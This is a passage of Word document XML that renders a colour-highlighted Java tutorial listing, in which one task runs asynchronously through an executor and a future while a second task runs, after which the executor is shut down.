          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Simulate a 3-second task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277066AA"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1F5337"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e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printStackTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C81516"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DDB7FF"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E884A9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373604C3"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Task 1 is running asynchronously"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E617D9D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1CC287"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Continue with other tasks while the asynchronous task is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035FB4BA"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Task 2 Started"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A4E478"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task2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD791B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7BCC69"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645DBC8C"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future1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Wait for Task 1 to complete before shutting down executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B172FFB"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExecutionException</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4398AA51"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e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printStackTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CAC243"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478B6034"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Task 2 Finished"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F678E4"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executor</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288A00A"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7077F9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB76B36"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> task2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4698FC10"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760ADEFB"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2000</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Simulate a 2-second task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1935FA"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
